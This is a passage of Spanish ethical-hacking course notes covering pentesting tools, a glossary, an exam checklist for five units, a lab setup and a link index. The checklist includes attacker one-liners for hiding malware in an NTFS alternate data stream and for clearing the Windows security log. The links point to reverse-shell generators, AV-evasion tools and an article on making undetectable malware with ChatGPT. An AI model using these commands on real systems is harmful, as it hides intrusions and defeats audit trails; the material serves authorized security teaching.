7. **Anexos** — herramientas, capturas, hashes

Herramientas para informe: **Dradis** (importar resultados de Nessus + ZAP + Nmap) → exportar a Word/HTML.

---

## 8. Tabla resumen de herramientas

| Herramienta | Categoría | Sistema | Gratuita | Fase | UD |
|---|---|---|---|---|---|
| nmap | Reconocimiento | Linux/Win | ✅ | Recolección + Análisis | UD1, UD2 |
| masscan | Reconocimiento | Linux | ✅ | Recolección | UD2 |
| zmap | Reconocimiento | Linux | ✅ | Recolección | UD2 |
| shodan | OSINT | Web/CLI | Parcial | Recolección | UD1 |
| amass | DNS | Linux | ✅ | Recolección | UD1 |
| knockpy | DNS | Linux | ✅ | Recolección | UD1 |
| dnsrecon | DNS | Linux | ✅ | Recolección | UD1 |
| theHarvester | OSINT | Linux | ✅ | Recolección | UD1 |
| Maltego | OSINT | Linux/Win | Parcial | Recolección | UD2 |
| airodump-ng | WiFi | Linux | ✅ | Recolección + Análisis | UD3 |
| aireplay-ng | WiFi | Linux | ✅ | Explotación | UD3 |
| aircrack-ng | WiFi | Linux | ✅ | Explotación | UD3 |
| reaver / bully | WiFi WPS | Linux | ✅ | Explotación | UD3 |
| Nessus Essentials | Vuln Analysis | Linux/Win | Parcial (16 hosts) | Análisis | UD5 |
| GVM / OpenVAS | Vuln Analysis | Linux | ✅ | Análisis | UD1, UD5 |
| OWASP ZAP | Web | Linux/Win | ✅ | Análisis + Explotación | UD4 |
| Burp Suite | Web | Linux/Win | Parcial | Análisis + Explotación | UD4 |
| Nikto | Web | Linux | ✅ | Análisis | UD4 |
| whatweb | Web fingerprint | Linux | ✅ | Recolección | UD4 |
| Wappalyzer | Web fingerprint | Extensión | ✅ | Recolección | UD4 |
| SQLmap | Web / SQLi | Linux | ✅ | Explotación | UD4 |
| weevely | Web / Webshell | Linux | ✅ | Post-explotación | UD4 |
| Metasploit | Explotación | Linux/Win | ✅ | Explotación + Post | UD5 |
| msfvenom | Payloads | Linux | ✅ | Explotación | UD5 |
| Veil-Evasion | Evasión AV | Linux | ✅ | Explotación | UD5 |
| TheFatRat | Evasión AV | Linux | ✅ | Explotación | UD5 |
| BeEF | Browser | Linux/macOS | ✅ | Explotación | UD5 |
| Meterpreter | Post-explotación | Linux | ✅ | Post-explotación | UD5 |
| Mimikatz | Credenciales | Windows | ✅ | Post-explotación | UD5 |
| pwdump8 | Credenciales | Windows | ✅ | Post-explotación | UD5 |
| Responder.py | Red Windows | Linux | ✅ | Post-explotación | UD5 |
| Empire | Post-explotación | Linux | ✅ | Post-explotación | UD5 |
| hashcat | Password cracking | Linux/Win | ✅ (GPU) | Análisis + Post | UD3, UD5 |
| John the Ripper | Password cracking | Linux | ✅ | Análisis | UD5 |
| L0phtCrack | Password cracking | Windows | Parcial | Análisis | UD5 |
| Wireshark | Análisis de red | Linux/Win | ✅ | Recolección + Análisis | UD2 |
| arping | ARP | Linux | ✅ | Explotación | UD2 |
| hping3 | Red | Linux | ✅ | Explotación | UD2 |
| Dradis | Informes | Linux | Parcial | Informes | UD4 |
| fragrouter | Evasión IDS | Linux | ✅ | Evasión | UD2 |
| PEASS-ng | Escalada de privilegios | Linux/Win | ✅ | Post-explotación | UD5 |
| CUPP | Generación de diccionarios | Linux | ✅ | Análisis | UD5 |
| CeWL | Generación de diccionarios | Linux | ✅ | Análisis | UD5 |

---

## 9. Tabla de conceptos clave por UD

| Concepto | Tipo | UD | Definición breve |
|---|---|---|---|
| Pentesting | Concepto | UD1 | Atacar sistemas con autorización para descubrir vulnerabilidades |
| Footprinting | Técnica | UD1 | Reconocimiento pasivo sin interacción directa con sistemas |
| Fingerprinting | Técnica | UD1 | Reconocimiento activo: puertos, versiones, SO |
| Enumeración | Técnica | UD1 | Conexiones directas para obtener info detallada (usuarios, grupos, DNS) |
| Google Dorking | Técnica | UD1 | Operadores de búsqueda avanzados para localizar información expuesta |
| WHOIS | Protocolo | UD1 | Consulta de propietario de dominio/IP; puerto 43/TCP |
| RIR | Concepto | UD1 | Registro Regional de Internet (RIPE=Europa, ARIN=USA, APNIC=Asia...) |
| CVSS | Estándar | UD1, UD2 | Sistema de puntuación 0–10 de severidad de vulnerabilidades (gestionado por FIRST) |
| CVE | Estándar | UD1, UD2 | Identificador único de vulnerabilidad pública (mantenido por MITRE) |
| Caja Negra | Concepto | UD1 | Auditoría sin información previa; simula atacante externo |
| Caja Gris | Concepto | UD1 | Auditoría con credenciales limitadas; simula atacante interno |
| Caja Blanca | Concepto | UD1 | Auditoría con credenciales máximas; colaboración total |
| Zero Day | Concepto | UD2 | Vulnerabilidad sin parche disponible |
| MITRE ATT&CK | Framework | UD2 | TTP de atacantes reales y APT |
| MITM | Ataque | UD2 | Man in the Middle; intercepta tráfico (ARP Spoofing es la técnica más común) |
| ARP Spoofing | Ataque | UD2 | Envenena caché ARP para suplantar gateway (L2) |
| SSLstrip | Ataque | UD2, UD4 | Convierte HTTPS en HTTP via MITM |
| BEC | Ataque | UD2 | Business Email Compromise; desvío de pagos mediante correo corporativo comprometido |
| BSSID | Concepto | UD3 | Dirección MAC de la tarjeta WiFi del AP |
| SSID | Concepto | UD3 | Nombre de la red WiFi (máx. 32 caracteres) |
| WEP | Protocolo | UD3 | RC4 + IV 24 bits; completamente roto |
| WPA2 | Protocolo | UD3 | AES-CCMP + IEEE 802.11i completo; seguro con contraseña fuerte |
| WPA3 | Protocolo | UD3 | SAE/Dragonfly; imposible diccionario offline |
| Handshake 4 vías | Protocolo | UD3 | Negociación de PTK en WPA/WPA2 sin transmitir la contraseña |
| PMK | Clave | UD3 | Pairwise Master Key; derivada de contraseña+SSID mediante PBKDF2 |
| PTK | Clave | UD3 | Pairwise Temporal Key; cifra tráfico unicast de la sesión |
| GTK | Clave | UD3 | Group Temporal Key; cifra tráfico multicast/broadcast |
| WPS | Protocolo | UD3 | Configuración rápida WiFi; PIN vulnerable (11.000 combinaciones) |
| Pixie-Dust | Ataque | UD3 | Ataque offline contra WPS explotando M3-M4 con nonces predecibles |
| KRACK | Vulnerabilidad | UD3 | Reinstalación de claves en handshake WPA2 (2017) |
| PMF | Tecnología | UD3 | Protected Management Frames; evita ataques de desautenticación |
| HTTP/2 | Protocolo | UD4 | Multiplexación, binario, TLS obligatorio; CVE-2023-44487 |
| TLS | Protocolo | UD4 | Transport Layer Security; cifrado híbrido para HTTPS |
| PKI | Infraestructura | UD4 | Public Key Infrastructure: CA, RA, VA, certificados |
| CA | Rol PKI | UD4 | Certification Authority; firma digitalmente los certificados |
| Certificado DV | Tipo | UD4 | Domain Validated; solo verifica el dominio |
| Certificado EV | Tipo | UD4 | Extended Validation; verificación exhaustiva de la organización |
| Heartbleed | Vulnerabilidad | UD4 | CVE-2014-0160; lee memoria RAM del servidor vía OpenSSL |
| HSTS | Cabecera HTTP | UD4 | Strict-Transport-Security; fuerza HTTPS en el navegador |
| FIDO2 / WebAuthn | Estándar | UD4 | Autenticación sin contraseña con biometría o hardware token |
| XSS Almacenado | Ataque | UD4 | Payload persistente en BD; afecta a todos los visitantes |
| XSS Reflejado | Ataque | UD4 | Payload en URL; solo afecta a quien abre el enlace malicioso |
| CSRF | Ataque | UD4 | Ejecuta acciones en nombre del usuario sin su conocimiento |
| SSRF | Ataque | UD4 | Usa el servidor como proxy hacia recursos internos |
| XXE | Ataque | UD4 | XML External Entity; lee ficheros locales o SSRF via parsers XML |
| SQLi | Ataque | UD4 | Inyección SQL; permite volcar BD o bypassear autenticación |
| Webshell | Herramienta | UD4, UD5 | Script PHP/ASP subido para ejecutar comandos en el servidor |
| SAM | Base de datos | UD5 | Security Accounts Manager; almacena hashes NTLM locales en Windows |
| Pass-the-Hash | Ataque | UD5 | Usa el hash NTLM directamente para autenticarse |
| LLMNR poisoning | Ataque | UD5 | Envenena resolución de nombres local para capturar hashes NTLMv2 |
| Buffer Overflow | Vulnerabilidad | UD5 | Sobreescritura de memoria por falta de validación de límites |
| Heap Overflow | Tipo | UD5 | Desbordamiento del montículo; el más habitual |
| DEP | Mitigación | UD5 | Data Execution Prevention; zonas de memoria no ejecutables |
| ASLR | Mitigación | UD5 | Aleatoriza las direcciones de memoria en cada ejecución |
| Metasploit | Framework | UD5 | Framework de pentesting con 1500+ exploits (Rapid7) |
| Meterpreter | Payload | UD5 | Payload avanzado de post-explotación; TLS, en memoria |
| BlueKeep | Vulnerabilidad | UD5 | CVE-2019-0708; CVSS 9.8; RCE en RDP sin autenticación |
| EternalBlue | Exploit | UD5 | MS17-010; exploit NSA filtrado; base de WannaCry |
| Escalada vertical | Técnica | UD5 | Pasar de usuario sin privilegios a Administrador/root |
| SUID | Concepto | UD5 | Bit en Linux que ejecuta el binario con permisos del propietario |
| LOTL | Técnica | UD5 | Living Off The Land; usar herramientas legítimas del SO (fileless) |
| Rootkit | Malware | UD5 | Modifica el SO para ocultar procesos y ficheros maliciosos |
| C2 / Fast Flux | Infraestructura | UD5 | Command & Control con IPs que cambian continuamente para evadir bloqueos |
| Pivoting | Técnica | UD5 | Usar sistema comprometido como puente hacia redes internas |
| NTFS ADS | Técnica | UD5 | Alternate Data Streams; ocultar datos en metadatos de ficheros NTFS |
| Pentesting by Design | Concepto | UD5 | Proceso de pentesting continuo 24×7 integrado en el ciclo de vida |
| Air Gap | Concepto | UD5 | Aislamiento físico de una red respecto a otras redes no seguras |
| GOAD | Laboratorio | UD5 | "Game Of Active Directory"; entorno de práctica de ataques a AD |

---

## 10. Checklist de preparación

### UD1 — Fundamentos

- [ ] Diferencia entre pentesting y análisis de vulnerabilidades
- [ ] Art. 197 CP: penas (6 meses – 2 años), solo sector privado
- [ ] White/Grey/Black Hat: qué hace cada uno y su situación legal
- [ ] Footprinting (pasivo) vs. Fingerprinting (activo) vs. Enumeración
- [ ] Operadores Google Dorking: `site:`, `intitle:`, `inurl:`, `filetype:`, `intext:`, `cache:`
- [ ] RIR: RIPE (Europa), ARIN (USA), APNIC (Asia), LACNIC (Latinoamérica), AfriNIC (África)
- [ ] BSSID = MAC del AP | SSID = nombre de red (máx. 32 chars)
- [ ] Registros DNS: A (IPv4), MX (correo), NS (servidor DNS), TXT (SPF/DKIM), PTR (inverso)
- [ ] CVSS rangos: <4 Baja, 4–7 Media, 7–9 Alta, >9 Crítica
- [ ] Caja Negra = sin info | Gris = credenciales parciales | Blanca = credenciales máximas
- [ ] Estrategia Double Blind: no se avisa a nadie → prueba detección del equipo IT
- [ ] Estrategia Reversal: toda la info al auditor, no se avisa al IT
- [ ] Metodologías: OSSTMM (general), OWASP (web), PCI-DSS (tarjetas), PTES (pentesting), ISSAF (dominios ISO)

### UD2 — Vulnerabilidades y ataques

- [ ] Vulnerabilidad de diseño (protocolos), implementación (código), uso (configuración)
- [ ] Zero Day = sin parche; ventana de vulnerabilidad = tiempo hasta que se instala el parche
- [ ] CVSS 4.0 métricas suplementarias: Seguridad, Automatizable, Recuperación, Densidad de Valor
- [ ] MITRE gestiona: CVE, CWE, CAPEC, ATT&CK
- [ ] ARP Spoofing → MITM más habitual; SSLstrip elimina HTTPS via MITM
- [ ] SSLsplit reemplaza certificado TLS real por falso creado al vuelo
- [ ] DHCP Starvation = agota pool de IPs (DoS); Rogue DHCP = servidor DHCP ilegítimo
- [ ] CAM Overflow = satura tabla MAC del switch → funciona como hub
- [ ] nmap -A = OS + versiones + scripts + traceroute
- [ ] nmap -sL = lista hosts SIN escanear
- [ ] nmap -sn = solo descubrimiento sin escaneo de puertos
- [ ] nmap -Pn = omite fase de descubrimiento (asume host activo)
- [ ] masscan >> nmap en velocidad; nmap >> masscan en detalle

### UD3 — WiFi

- [ ] WEP: RC4, IV **24 bits**, CRC-32, sin gestión de claves → siempre roto
- [ ] WPA2: AES-CCMP, IV 48 bits, handshake 4 vías, IEEE 802.11i
- [ ] WPA3: SAE/Dragonfly → diccionario offline IMPOSIBLE
- [ ] Modo Open = más seguro que Shared en WEP (paradoja)
- [ ] Clave de asignación WEP = protege unicast; clave predeterminada = protege broadcast
- [ ] WPS PIN = 8 dígitos pero se verifica en 2 mitades = 11.000 combinaciones
- [ ] Pixie-Dust = ataque offline contra M3-M4; no ataque online
- [ ] DragonBlood = downgrade WPA3→WPA2 (parcheado en la mayoría)
- [ ] PMF = evita ataques de desautenticación; obligatorio en WPA3
- [ ] Footprinting pasivo WiFi = airodump-ng (modo monitor, sin inyectar)
- [ ] SSID oculto → se descubre capturando tramas de re-asociación tras deauth

### UD4 — Web

- [ ] GET = parámetros en URL (nunca para credenciales); POST = en body
- [ ] HTTP/2 requiere TLS obligatorio; HTTP/3 usa UDP/QUIC
- [ ] CVE-2023-44487 = Rapid Reset en HTTP/2 (DoS)
- [ ] SSL obsoleto; usar TLS 1.2 mínimo, mejor TLS 1.3
- [ ] CA firma certificados; RA verifica identidad del solicitante
- [ ] DV (solo dominio) < OV (organización) < EV (validación exhaustiva)
- [ ] Heartbleed = lee RAM del servidor; no necesita MITM
- [ ] POODLE = downgrade a SSL 3.0 + MITM
- [ ] HSTS Preload = máxima protección contra SSLstrip desde la primera visita
- [ ] Basic Auth = Base64 (no cifrado, solo ofuscación) → inseguro sin TLS
- [ ] FIDO2 verifica biometría/PIN localmente; nunca lo envía al sitio
- [ ] XSS almacenado persiste en BD; reflejado requiere que la víctima abra el enlace
- [ ] `HttpOnly` en cookie → JS no puede acceder → protección contra XSS
- [ ] Operadores Cmd Injection: `;` (siempre ambos), `&&` (si 1º OK), `||` (si 1º falla)
- [ ] CVSS Shellshock = 9.8 (aparece con credenciales en Nessus, no sin ellas)

### UD5 — Sistemas

- [ ] SAM almacena hashes NTLM locales; bloqueada por el kernel en ejecución
- [ ] Salt en `/etc/shadow` = mismo password → hashes diferentes → tablas rainbow ineficaces
- [ ] Pass-the-Hash: conocer el hash NTLM equivale a conocer la contraseña
- [ ] LLMNR/NBT-NS: Responder.py → captura hashes NTLMv2 → `hashcat -m 5600`
- [ ] Heap overflow = más habitual (entradas no validadas)
- [ ] DEP = marca memoria como no ejecutable; ASLR = aleatoriza direcciones
- [ ] Exploit = cabecera (específica) + payload (reutilizable)
- [ ] Metasploit módulos: Auxiliary, Exploits, **Payloads, Encoders, Post, Evasion, Nops** (7 tipos)
- [ ] Meterpreter = payload staged, TLS, en memoria, difícil de detectar
- [ ] BlueKeep = CVSS 9.8; EternalBlue = MS17-010; Shellshock = CVE-2014-6271 CVSS 9.8
- [ ] Escalada vertical = bajo privilegio → Administrador/root (la más habitual)
- [ ] `find / -perm -4000 2>/dev/null` = buscar binarios SUID en Linux
- [ ] `sudo -l` = ver qué puede ejecutar el usuario como root
- [ ] LOTL = herramientas legítimas del SO (PowerShell, cron, registro, WMI)
- [ ] Fast Flux Simple = IPs del dominio C2 cambian cada pocos minutos
- [ ] Registro Windows persistencia: `HKLM\...\Run` (persiste) vs `RunOnce` (solo una vez)
- [ ] NTFS ADS = `type malware.exe > legit.txt:stream_oculto`
- [ ] `wevtutil cl Security` = limpiar log de seguridad de Windows

---

## 11. Resumen en 30 segundos

| UD | Tema principal | Herramientas clave | Conceptos clave | Prácticas |
|---|---|---|---|---|
| **UD1** | Fundamentos, legislación, OSINT | nmap, dig, whois, shodan, amass | Footprinting / Fingerprinting / Enumeración; Art.197 CP; CVSS; Caja Negra/Gris/Blanca | P1-WHOIS, P2-DNS, P3-Google Dorks |
| **UD2** | Vulnerabilidades, ataques de red | nmap avanzado (NSE), masscan, arping, Metasploit, Responder.py | Zero Day, CVSS 4.0, MITRE ATT&CK, ARP Spoofing, MITM, SSLstrip, LLMNR poisoning | P1-ARP Spoofing, P2-NMAP |
| **UD3** | Redes inalámbricas WiFi | aircrack-ng suite, hashcat, reaver, bully | WEP (roto), WPA2 (seguro), WPA3 (Dragonfly), WPS (11k combinaciones), Pixie-Dust | WEP crack, WPA handshake, WPS brute |
| **UD4** | Aplicaciones web | ZAP, Nikto, whatweb, SQLmap, weevely, Dradis | HTTP/2, TLS, PKI, Heartbleed, HSTS, XSS, CSRF, SQLi, Cmd Injection, Webshells | P1-SSL, P2-Fingerprint, P4-Nikto, P5-ZAP, P6-Weevely |
| **UD5** | Sistemas OS | Metasploit, Meterpreter, hashcat, Nessus, Mimikatz, pwdump8 | Buffer Overflow, SAM/NTLM, Kerberos, Pass-the-Hash, Escalada SUID/sudo, LOTL, Persistencia, Borrado de huellas | P1-Hashcat, P2-pwdump, P3-Nessus, P4-Metasploit |

**Ciclo completo de una auditoría:**
```
Contrato → Recolección (OSINT+Nmap) → Análisis (Nessus+ZAP+Nikto)
→ Explotación (Metasploit+SQLmap+aircrack) → Post-explotación (Meterpreter+Weevely)
→ Informe (Dradis → Word/HTML)
```

**Regla de oro:** Toda actividad de pentesting requiere **autorización contractual expresa** del propietario del sistema. Sin contrato firmado, es delito (Art. 197 CP).

**Entorno de laboratorio habitual:**
- Atacante: Kali Linux
- Objetivos: Metasploitable 2 (192.168.100.171), DVWA, Mutillidae
- Máquina Windows vulnerable (BlueKeep, EternalBlue)
- AP WiFi de laboratorio

---

## 12. Índice de enlaces


### General / Herramientas base

| Recurso | URL | Tipo | UD / Tema |
|---|---|---|---|
| Kali Linux – descarga oficial | https://www.kali.org/get-kali/#kali-platforms | Documentación oficial | General |
| Instalación de Kali (YouTube) | https://www.youtube.com/watch?v=ImuMIW_oWOo | Vídeo | General |
| Parrot OS Security Edition – descarga | https://www.parrotsec.org/download/ | Documentación oficial | General |
| Metasploit Framework – descarga | https://www.metasploit.com/download | Documentación oficial | General / UD5 |
| Metasploitable2 – documentación oficial | https://docs.rapid7.com/metasploit/metasploitable-2/ | Documentación oficial | General / UD5 |
| Cisco Talos – mapa de amenazas | https://talosintelligence.com/fullpage_maps/pulse | Referencia | General |
| Threatbutt – mapa de amenazas | https://threatbutt.com/map/ | Referencia | General |
| Check Point – mapa de amenazas | https://threatmap.checkpoint.com/ | Referencia | General |
| Fortinet – mapa de amenazas | https://threatmap.fortiguard.com/ | Referencia | General |
| FireEye – mapa de amenazas | https://www.fireeye.com/cyber-map/threat-map.html | Referencia | General |
| Kaspersky Cybermap | https://cybermap.kaspersky.com/ | Referencia | General |
| Bitdefender – mapa de amenazas | https://threatmap.bitdefender.com/ | Referencia | General |
| Arbor Networks / Digital Attack Map | https://www.digitalattackmap.com/ | Referencia | General |
| Spamhaus – mapa de amenazas | https://www.spamhaus.com/threat-map/ | Referencia | General |
| SonicWall – mapa de amenazas | https://securitycenter.sonicwall.com/m/page/worldwide-attacks | Referencia | General |
| Netscout Horizon | https://horizon.netscout.com/ | Referencia | General |
| LookingGlass – mapa de amenazas | https://map.lookingglasscyber.com/ | Referencia | General |
| Bug Bounty: cómo funciona | https://www.welivesecurity.com/la-es/2020/01/21/bug-bounty-como-funciona-hacking-etico-caceria-vulnerabilidades/ | Blog/artículo | General |
| Sistemas vulnerables para practicar pentesting | https://blog.elhacker.net/2022/02/sistemas-vulnerables-para-practicar-legalmente-pentesting.html?m=1 | Blog/artículo | General |
| HackTheBox Academy | https://academy.hackthebox.com/ | Curso | General |
| MITRE ATT&CK Enterprise Matrix | https://attack.mitre.org/matrices/enterprise/ | Documentación oficial | General / UD2 |
| MITRE ATT&CK Navigator | https://mitre-attack.github.io/attack-navigator/ | Documentación oficial | General / UD2 |
| MITRE ATLAS (IA) | https://atlas.mitre.org/ | Documentación oficial | General |
| Docker – clave GPG (Debian) | https://download.docker.com/linux/debian/gpg | Documentación oficial | General |

### UD1 — enlaces adicionales

| Recurso | URL | Tipo | UD / Tema |
|---|---|---|---|
| Informe de pentesting (YouTube) | https://www.youtube.com/watch?v=EOoBAq6z4Zk | Vídeo | UD1 |
| raikar – pentesting-reports (GitHub) | https://github.com/raikar/pentesting-reports | GitHub | UD1 |
| Cómo funciona DMARC con subdominios (dmarcly) | https://dmarcly.com/blog/how-dmarc-works-with-subdomains-dmarc-sp-tag | Tutorial | UD1 |
| Cómo funciona DMARC con subdominios (Valimail) | https://www.valimail.com/blog/how-dmarc-works-with-subdomains/ | Tutorial | UD1 |
| Shodan CLI – vídeos de ejemplo (asciinema) | https://asciinema.org/~Shodan | Tutorial | UD1 |
| Cómo bloquear a Shodan | https://www.busindre.com/bloquear_ips_del_escaner_shodan | Tutorial | UD1 |

### UD5 — enlaces adicionales

| Recurso | URL | Tipo | UD / Tema |
|---|---|---|---|
| Cracking de contraseñas con hashcat (Security Artwork) | https://www.securityartwork.es/2017/02/15/cracking-contrasenas-hashcat/ | Tutorial | UD5 |
| Tenable for Education – vídeos | https://www.tenable.com/tenable-for-education | Curso | UD5 |
| BlueKeep con Metasploit – ajuste GroomBase | https://pentest-tools.com/blog/bluekeep-exploit-metasploit#5-adjusting-the-bluekeep-exploit-groombase | Blog/artículo | UD5 |
| Cheatsheet: Pivoting con SSH y Meterpreter | https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/ | Referencia | UD5 |
| Weakpass – diccionarios de contraseñas | https://weakpass.com/wordlist | Referencia | UD5 |
| Weakpass – Crack JS | https://weakpass.com/crack-js | Referencia | UD5 |
| CUPP – generación de diccionarios | https://esgeeks.com/como-utilizar-cupp/ | Tutorial | UD5 |
| CeWL (GitHub) | https://github.com/digininja/CeWL | GitHub | UD5 |
| Kaspersky Password Checker | https://password.kaspersky.com/es/ | Referencia | UD5 |
| Reverse Shell Cheat Sheet (PayloadsAllTheThings) | https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md | GitHub | UD5 |
| Reverse Shell Generator (online) | https://www.revshells.com/ | Referencia | UD5 |
| Revshellgen (GitHub) | https://github.com/t0thkr1s/revshellgen | GitHub | UD5 |
| PEASS-ng (GitHub) | https://github.com/carlospolop/PEASS-ng | GitHub | UD5 |
| Sherlock – escalada de privilegios Windows | https://www.hackplayers.com/2017/04/sherlock-un-script-powershell-escalar-privilegios.html | Tutorial | UD5 |
| PrivescCheck – escalada de privilegios Windows | https://esgeeks.com/privesccheck-enumeracion-escalar-privilegios-windows/ | Tutorial | UD5 |
| LOLDrivers Project | https://www.loldrivers.io/ | Documentación oficial | UD5 |
| GOAD (GitHub) | https://github.com/Orange-Cyberdefense/GOAD | GitHub | UD5 |
| PentAGI – pentesting con agentes IA (GitHub) | https://github.com/vxcontrol/pentagi | GitHub | UD5 |
| El "Ramónware" (LinkedIn) | https://py.linkedin.com/posts/raulguillen_rtve-humor-ciber-activity-6999642097863520256-npsX | Blog/artículo | UD5 |
| Meterpreter: conceptos básicos | https://thehackerway.com/2011/04/26/conceptos-basicos-de-meterpreter-metasploit-framework/ | Tutorial | UD5 |
| Veil-Evasion, Shellter y PayDay | https://www.elladodelmal.com/2016/04/veil-evasion-shellter-payday-para.html | Blog/artículo | UD5 |
| Empire Framework contra Windows | https://thehackerway.com/2019/09/02/uso-de-empire-framework-contra-sistemas-windows/ | Tutorial | UD5 |
| Top herramientas hardware hacking | https://foro.hackhispano.com/threads/48688-Top-de-herramientas-y-gadgets-para-hardware-hacking | Blog/artículo | UD5 |
| Rubber Ducky USB | https://www.redeszone.net/2018/03/17/rubber-ducky-usb-atacar-ordenador/ | Blog/artículo | UD5 |
| Malduino BadUSB | https://www.neoteo.com/malduino-badusb-al-alcance-todos/ | Blog/artículo | UD5 |
| ICQUANZX BadUSB (Amazon) | https://www.amazon.pl/ICQUANZX-Mikrokontroler-ATMEGA32U4-rozwojowa-klawiatura/dp/B07VT6QX9R | Otros recursos | UD5 |
| BadUSB: malware que infecta USB | https://www.neoteo.com/badusb-malware-que-infecta-dispositivos-usb/ | Blog/artículo | UD5 |
| Bash Bunny / Air gap (Computer Weekly) | https://www.computerweekly.com/es/opinion/Que-es-un-air-gap-y-por-que-es-importante-frente-a-los-ataques-de-ransomware | Blog/artículo | UD5 |
| Creación de tarea programada con PowerShell | https://adamtheautomator.com/powershell-scheduled-task/ | Tutorial | UD5 |
| badBIOS: malware por ultrasonidos | https://computerhoy.com/noticias/software/virus-badbios-contamina-pcs-sonido-usando-microfono-44598 | Blog/artículo | UD5 |
| Técnicas de detección de VM (Check Point Evasion) | https://evasions.checkpoint.com/ | Referencia | UD5 |
| Malware indetectable con ChatGPT | https://noticiasseguridad.com/tutoriales/como-crear-malware-indetectable-a-traves-de-chatgpt-en-7-sencillos-pasos/ | Tutorial | UD5 |
| GOAD (segu-info) | https://blog.segu-info.com.ar/2023/11/goad-game-of-active-directory-pentesting.html?m=1 | Blog/artículo | UD5 |

### Índice original

| Recurso | URL | Tipo | UD / Tema |
|---|---|---|---|
| amass – enumeración DNS | (herramienta CLI en Kali) | Herramienta | UD1 |
| ATT&CK – MITRE | https://attack.mitre.org | Documentación oficial | UD2 |
| BeEF – Browser Exploitation Framework | https://beefproject.com/ | Documentación oficial | UD5 |
| Bing Dorks – referencia | (contenido dentro de los apuntes) | Referencia | UD1 |
| Blog elhacker.net – ARC y DANE | https://blog.elhacker.net/2024/04/configurar-email-seguro-arc-dane-tlsa.html | Blog/artículo | UD1 |
| BishopFox – informes pentesting públicos | https://github.com/BishopFox/public-pentesting-reports | GitHub | UD1 |
| capec.mitre.org – patrones de ataque | https://capec.mitre.org | Documentación oficial | UD2 |
| Certificate Transparency – blogthinkbig | https://empresas.blogthinkbig.com/certificate-transparency-el-que-el-como/ | Blog/artículo | UD4 |
| Certificate Transparency – GlobalSign | https://www.globalsign.com/es/blog/what-is-certificate-transparency | Blog/artículo | UD4 |
| CentralOps – Network tools | https://centralops.net/co/ | Referencia (herramienta online) | UD1 |
| Charla introductoria Hacking Ético (Drive) | https://drive.google.com/file/d/1UQndaXjnD2BjsKBIqsF48gNVorrnfTym/view | Vídeo | UD1 |
| Ciberseguridad Euskadi – CVE y CNA en España | https://ciberseguridad.euskadi.eus/ciberpedia/vulnerabilidades/que-es-un-cve-y-entidades-en-espana-que-son-cna/ | Tutorial | UD2 |
| Codiga – CVE vs CWE | https://www.codiga.io/blog/cve-vs-cwe/ | Tutorial | UD2 |
| CrackStation – rainbow tables online | https://crackstation.net | Referencia | UD5 |
| CSP Evaluator – Google | https://csp-evaluator.withgoogle.com/ | Referencia (herramienta online) | UD4 |
| cve.mitre.org – catálogo CVE | https://cve.mitre.org | Documentación oficial | UD1, UD2 |
| cvedetails.com – estadísticas CVE | https://www.cvedetails.com | Referencia | UD2 |
| cwe.mitre.org – debilidades de software | https://cwe.mitre.org | Documentación oficial | UD2 |
| cyberseguridad.net – HTML Smuggling | https://cyberseguridad.net/contrabando-de-html-html-smuggling-ataques-informaticos-xviii | Blog/artículo | UD4 |
| Demo banco sin HTTPS – testfire | http://demo.testfire.net/login.jsp | Vídeo / demo | UD4 |
| Diccionarios WPA/WPA2 para fuerza bruta | https://www.wirelesshack.org/wpa-wpa2-word-list-dictionaries.html | Referencia | UD3 |
| DMARC – Hispasec | https://unaaldia.hispasec.com/2022/10/que-es-dmarc-la-necesidad-de-la-proteccion-del-correo-electronico.html | Blog/artículo | UD1 |
| DMARC/DKIM/SPF – guía definitiva | https://dmarcly.com/blog/how-to-implement-dmarc-dkim-spf-to-stop-email-spoofing-phishing-the-definitive-guide | Tutorial | UD1 |
| DNS Checker – herramientas online | https://dnschecker.org/all-tools.php | Referencia | UD1 |
| EasyDMARC – SPF Lookup | https://easydmarc.com/tools/spf-lookup | Referencia | UD1 |
| EasyDMARC – Sintaxis SPF | https://easydmarc.com/blog/es/sintaxis-de-registro-spf-estructura-y-componentes/ | Tutorial | UD1 |
| El lado del mal – HPKP | https://www.elladodelmal.com/2020/01/hkpk-cuando-una-medida-de-seguridad.html | Blog/artículo | UD4 |
| El lado del mal – SSRF/XSPA | https://www.elladodelmal.com/2015/04/ssrf-server-side-request-forgery-xspa.html | Blog/artículo | UD4 |
| FIRST – Calculadora CVSS 4.0 | https://www.first.org/cvss/calculator/4.0 | Documentación oficial | UD1, UD2 |
| flu-project – Tutorial Shodan CLI | https://www.flu-project.com/2020/04/shodan-cli.html | Tutorial | UD1 |
| ftp.ripe.net – descarga ripe.db.gz | https://ftp.ripe.net/ripe/dbase/ | Documentación oficial | UD1 |
| Google Hacking Database (GHDB) | https://www.exploit-db.com/google-hacking-database | Documentación oficial | UD1 |
| Google Toolbox – Dig online | https://toolbox.googleapps.com/apps/dig/ | Referencia | UD1 |
| GTFOBins – binarios Linux para escalada | https://gtfobins.github.io | Documentación oficial | UD4, UD5 |
| h1rd.com – artículos NMAP | http://www.h1rd.com/tags/nmap.html | Blog/artículo | UD2 |
| Hackplayers – Rapid Reset HTTP/2 | https://www.hackplayers.com/2023/10/probando-la-vulnerabilidad-rapid-reset.html | Blog/artículo | UD4 |
| Hak5 – LAN Turtle (producto) | https://shop.hak5.org/products/lan-turtle | Otros recursos | UD5 |
| hashcat.net – cap2hashcat | https://hashcat.net/cap2hashcat/ | Referencia (herramienta online) | UD3 |
| henryraul – Análisis webshell IndoXploit | https://henryraul.wordpress.com/2017/01/09/analisis-de-la-shellcode-indoxploit/ | Tutorial | UD4 |
| henryraul – Fuzzing ZAP Directory Traversal | https://henryraul.wordpress.com/2017/04/02/fuzzing-con-owasp-zap-proxy-profundizando-en-el-analisis-de-directory-traversal-y-detectando-en-lote-archivos-por-defecto/ | Tutorial | UD4 |
| HSTS Preload | https://hstspreload.org | Documentación oficial | UD4 |
| http.cat – códigos de estado HTTP | https://http.cat/ | Otros recursos | UD4 |
| INCIBE – Hacking ético empresarial | https://www.incibe.es/protege-tu-empresa/blog/el-hacking-etico-y-sus-beneficios-el-mundo-empresarial | Documentación oficial | UD1 |
| INCIBE-CERT – CVSS 4.0 | https://www.incibe.es/incibe-cert/blog/cvss-v40-avanzando-en-la-evaluacion-de-vulnerabilidades | Documentación oficial | UD2 |
| INCIBE-CERT – CVSS 3.0 | https://www.incibe-cert.es/blog/cvss3-0 | Documentación oficial | UD2 |
